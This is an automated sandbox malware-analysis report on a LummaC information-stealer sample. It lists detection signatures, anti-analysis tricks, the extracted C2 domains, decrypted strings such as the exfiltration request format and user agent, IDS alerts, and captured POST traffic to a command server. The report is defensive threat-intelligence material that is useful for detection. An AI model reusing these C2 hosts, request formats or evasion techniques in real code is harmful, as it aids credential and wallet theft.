Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532752
MD5:721993ac48789fdb695ef35383b11c82
SHA1:383b3cdf3da4dbd15c5510664739a547dbb6ad20
SHA256:982c7aeeb92f939d4c64ecf5da251ab5a8b1ff854f627ec324f7b70c0a6f2d88
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 5256 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 721993AC48789FDB695EF35383B11C82)
    • WerFault.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1060 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store", "spirittunek.store", "dissapoiznw.store"], "Build id": "mom--6"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:08.579341+020020546531A Network Trojan was detected192.168.2.549705104.21.53.8443TCP
    2024-10-13T21:40:09.631118+020020546531A Network Trojan was detected192.168.2.549706104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:08.579341+020020498361A Network Trojan was detected192.168.2.549705104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:09.631118+020020498121A Network Trojan was detected192.168.2.549706104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.269956+020020564771Domain Observed Used for C2 Detected192.168.2.5571541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.193421+020020564711Domain Observed Used for C2 Detected192.168.2.5599421.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.239904+020020564811Domain Observed Used for C2 Detected192.168.2.5608781.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.228324+020020564831Domain Observed Used for C2 Detected192.168.2.5537891.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.298702+020020564731Domain Observed Used for C2 Detected192.168.2.5494701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.216013+020020564851Domain Observed Used for C2 Detected192.168.2.5566441.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.282925+020020564751Domain Observed Used for C2 Detected192.168.2.5563431.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:06.250033+020020564791Domain Observed Used for C2 Detected192.168.2.5553831.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:40:07.792153+020028586661Domain Observed Used for C2 Detected192.168.2.549704104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: file.exe.5256.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store", "spirittunek.store", "dissapoiznw.store"], "Build id": "mom--6"}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0019D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0019D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_001D99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0019FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_001A0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001D5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_001A6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_001D3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_001AD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_001949A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001A1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00195A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_001D4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_001A1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001A42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0019A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_001D9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_001A1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001A3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_001AB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001AD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_001BC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_001BCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001BCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_001BCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001D9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_001D9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001B9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_001BFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001A6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_00198590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_001A1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_001A6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0019BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00196EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_001A6F91

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:56343 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:55383 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:60878 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:57154 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:53789 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:49470 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:59942 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56644 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0kIDZS1AddzvbqcMuXqu5mPsh5phixIkLU9lDK.HpZc-1728848408-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.2072193015.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2293219794.0000000000B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.2072193015.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/2
    Source: file.exe, 00000000.00000003.2072193015.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2293219794.0000000000B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000002.2293219794.0000000000B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/s
    Source: file.exe, 00000000.00000002.2293219794.0000000000B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apis
    Source: file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
